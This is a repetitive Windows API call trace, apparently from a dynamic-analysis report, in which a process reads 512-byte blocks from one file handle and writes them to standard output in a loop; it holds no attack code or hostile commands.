[0149.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.851] GetFileType (hFile=0x50) returned 0x1 [0149.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.851] WriteFile (in: hFile=0x50, lpBuffer=0x2aecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aecdc*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.851] GetFileType (hFile=0x50) returned 0x1 [0149.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.851] WriteFile (in: hFile=0x50, lpBuffer=0x2aed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed2c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.851] GetFileType (hFile=0x50) returned 0x1 [0149.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.851] WriteFile (in: hFile=0x50, lpBuffer=0x2aed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed7c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.851] GetFileType (hFile=0x50) returned 0x1 [0149.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.851] WriteFile (in: hFile=0x50, lpBuffer=0x2aedcc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aedcc*, lpNumberOfBytesWritten=0x2addd0*=0x20, lpOverlapped=0x0) returned 1 [0149.851] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.851] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addbc | out: lpNewFilePointer=0x0) returned 1 [0149.851] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.851] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, 
lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.852] GetFileType (hFile=0x50) returned 0x1 [0149.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.852] GetFileType (hFile=0x50) returned 0x1 [0149.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.852] WriteFile (in: hFile=0x50, lpBuffer=0x2aebec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.852] GetFileType (hFile=0x50) returned 0x1 [0149.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.852] WriteFile (in: hFile=0x50, lpBuffer=0x2aec3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec3c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.852] GetFileType (hFile=0x50) returned 0x1 [0149.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.852] WriteFile (in: hFile=0x50, lpBuffer=0x2aec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec8c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.852] GetFileType (hFile=0x50) returned 0x1 [0149.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.852] WriteFile (in: hFile=0x50, lpBuffer=0x2aecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aecdc*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.852] GetFileType (hFile=0x50) returned 0x1 [0149.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.852] WriteFile (in: hFile=0x50, lpBuffer=0x2aed2c*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed2c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.852] GetFileType (hFile=0x50) returned 0x1 [0149.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.852] WriteFile (in: hFile=0x50, lpBuffer=0x2aed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed7c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.852] GetFileType (hFile=0x50) returned 0x1 [0149.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.852] WriteFile (in: hFile=0x50, lpBuffer=0x2aedcc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aedcc*, lpNumberOfBytesWritten=0x2addd0*=0x20, lpOverlapped=0x0) returned 1 [0149.852] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.852] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addbc | out: lpNewFilePointer=0x0) returned 1 [0149.852] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.852] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.853] GetFileType (hFile=0x50) returned 0x1 [0149.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.853] GetFileType (hFile=0x50) returned 0x1 [0149.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.853] WriteFile (in: hFile=0x50, lpBuffer=0x2aebec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.853] GetFileType 
(hFile=0x50) returned 0x1 [0149.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.853] WriteFile (in: hFile=0x50, lpBuffer=0x2aec3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec3c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.853] GetFileType (hFile=0x50) returned 0x1 [0149.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.853] WriteFile (in: hFile=0x50, lpBuffer=0x2aec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec8c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.853] GetFileType (hFile=0x50) returned 0x1 [0149.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.853] WriteFile (in: hFile=0x50, lpBuffer=0x2aecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aecdc*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.853] GetFileType (hFile=0x50) returned 0x1 [0149.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.853] WriteFile (in: hFile=0x50, lpBuffer=0x2aed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed2c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.853] GetFileType (hFile=0x50) returned 0x1 [0149.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.853] WriteFile (in: hFile=0x50, lpBuffer=0x2aed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed7c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.853] GetFileType (hFile=0x50) returned 0x1 [0149.853] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0149.853] WriteFile (in: hFile=0x50, lpBuffer=0x2aedcc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aedcc*, lpNumberOfBytesWritten=0x2addd0*=0x20, lpOverlapped=0x0) returned 1 [0149.854] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.854] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addbc | out: lpNewFilePointer=0x0) returned 1 [0149.854] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.854] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.854] GetFileType (hFile=0x50) returned 0x1 [0149.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.854] GetFileType (hFile=0x50) returned 0x1 [0149.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.854] WriteFile (in: hFile=0x50, lpBuffer=0x2aebec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.854] GetFileType (hFile=0x50) returned 0x1 [0149.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.854] WriteFile (in: hFile=0x50, lpBuffer=0x2aec3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec3c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.854] GetFileType (hFile=0x50) returned 0x1 [0149.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.854] WriteFile (in: hFile=0x50, lpBuffer=0x2aec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec8c*, 
lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.854] GetFileType (hFile=0x50) returned 0x1 [0149.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.854] WriteFile (in: hFile=0x50, lpBuffer=0x2aecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aecdc*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.854] GetFileType (hFile=0x50) returned 0x1 [0149.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.854] WriteFile (in: hFile=0x50, lpBuffer=0x2aed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed2c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.854] GetFileType (hFile=0x50) returned 0x1 [0149.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.854] WriteFile (in: hFile=0x50, lpBuffer=0x2aed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed7c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.854] GetFileType (hFile=0x50) returned 0x1 [0149.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.854] WriteFile (in: hFile=0x50, lpBuffer=0x2aedcc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aedcc*, lpNumberOfBytesWritten=0x2addd0*=0x20, lpOverlapped=0x0) returned 1 [0149.855] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.855] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addbc | out: lpNewFilePointer=0x0) returned 1 [0149.855] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.855] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.855] GetFileType (hFile=0x50) returned 0x1 [0149.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.855] GetFileType (hFile=0x50) returned 0x1 [0149.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.855] WriteFile (in: hFile=0x50, lpBuffer=0x2aebec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.855] GetFileType (hFile=0x50) returned 0x1 [0149.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.855] WriteFile (in: hFile=0x50, lpBuffer=0x2aec3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec3c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.855] GetFileType (hFile=0x50) returned 0x1 [0149.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.855] WriteFile (in: hFile=0x50, lpBuffer=0x2aec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec8c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.855] GetFileType (hFile=0x50) returned 0x1 [0149.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.855] WriteFile (in: hFile=0x50, lpBuffer=0x2aecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aecdc*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.855] GetFileType (hFile=0x50) returned 0x1 [0149.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.855] WriteFile (in: 
hFile=0x50, lpBuffer=0x2aed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed2c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.855] GetFileType (hFile=0x50) returned 0x1 [0149.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.855] WriteFile (in: hFile=0x50, lpBuffer=0x2aed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed7c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.855] GetFileType (hFile=0x50) returned 0x1 [0149.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.855] WriteFile (in: hFile=0x50, lpBuffer=0x2aedcc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aedcc*, lpNumberOfBytesWritten=0x2addd0*=0x20, lpOverlapped=0x0) returned 1 [0149.856] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.856] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addbc | out: lpNewFilePointer=0x0) returned 1 [0149.856] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.856] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.856] GetFileType (hFile=0x50) returned 0x1 [0149.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.856] GetFileType (hFile=0x50) returned 0x1 [0149.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.856] WriteFile (in: hFile=0x50, lpBuffer=0x2aebec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.856] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0149.856] GetFileType (hFile=0x50) returned 0x1 [0149.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.856] WriteFile (in: hFile=0x50, lpBuffer=0x2aec3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec3c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.856] GetFileType (hFile=0x50) returned 0x1 [0149.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.856] WriteFile (in: hFile=0x50, lpBuffer=0x2aec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec8c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.856] GetFileType (hFile=0x50) returned 0x1 [0149.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.856] WriteFile (in: hFile=0x50, lpBuffer=0x2aecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aecdc*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.856] GetFileType (hFile=0x50) returned 0x1 [0149.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.856] WriteFile (in: hFile=0x50, lpBuffer=0x2aed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed2c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.857] GetFileType (hFile=0x50) returned 0x1 [0149.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.857] WriteFile (in: hFile=0x50, lpBuffer=0x2aed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed7c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.857] _get_osfhandle (_FileHandle=1) returned 0x50 
[0149.857] GetFileType (hFile=0x50) returned 0x1 [0149.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.857] WriteFile (in: hFile=0x50, lpBuffer=0x2aedcc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aedcc*, lpNumberOfBytesWritten=0x2addd0*=0x20, lpOverlapped=0x0) returned 1 [0149.857] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.857] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addbc | out: lpNewFilePointer=0x0) returned 1 [0149.857] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.857] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.857] GetFileType (hFile=0x50) returned 0x1 [0149.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.857] GetFileType (hFile=0x50) returned 0x1 [0149.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.857] WriteFile (in: hFile=0x50, lpBuffer=0x2aebec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.857] GetFileType (hFile=0x50) returned 0x1 [0149.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.857] WriteFile (in: hFile=0x50, lpBuffer=0x2aec3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec3c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.857] GetFileType (hFile=0x50) returned 0x1 [0149.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.858] WriteFile (in: hFile=0x50, lpBuffer=0x2aec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, 
lpOverlapped=0x0 | out: lpBuffer=0x2aec8c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.858] GetFileType (hFile=0x50) returned 0x1 [0149.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.858] WriteFile (in: hFile=0x50, lpBuffer=0x2aecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aecdc*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.858] GetFileType (hFile=0x50) returned 0x1 [0149.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.858] WriteFile (in: hFile=0x50, lpBuffer=0x2aed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed2c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.858] GetFileType (hFile=0x50) returned 0x1 [0149.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.858] WriteFile (in: hFile=0x50, lpBuffer=0x2aed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed7c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.858] GetFileType (hFile=0x50) returned 0x1 [0149.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.858] WriteFile (in: hFile=0x50, lpBuffer=0x2aedcc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aedcc*, lpNumberOfBytesWritten=0x2addd0*=0x20, lpOverlapped=0x0) returned 1 [0149.858] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.858] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addbc | out: lpNewFilePointer=0x0) returned 1 [0149.858] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.858] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.858] GetFileType (hFile=0x50) returned 0x1 [0149.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.859] GetFileType (hFile=0x50) returned 0x1 [0149.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.859] WriteFile (in: hFile=0x50, lpBuffer=0x2aebec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.859] GetFileType (hFile=0x50) returned 0x1 [0149.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.859] WriteFile (in: hFile=0x50, lpBuffer=0x2aec3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec3c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.859] GetFileType (hFile=0x50) returned 0x1 [0149.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.859] WriteFile (in: hFile=0x50, lpBuffer=0x2aec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec8c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.859] GetFileType (hFile=0x50) returned 0x1 [0149.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.859] WriteFile (in: hFile=0x50, lpBuffer=0x2aecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aecdc*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.859] GetFileType (hFile=0x50) returned 0x1 [0149.859] _get_osfhandle (_FileHandle=1) returned 
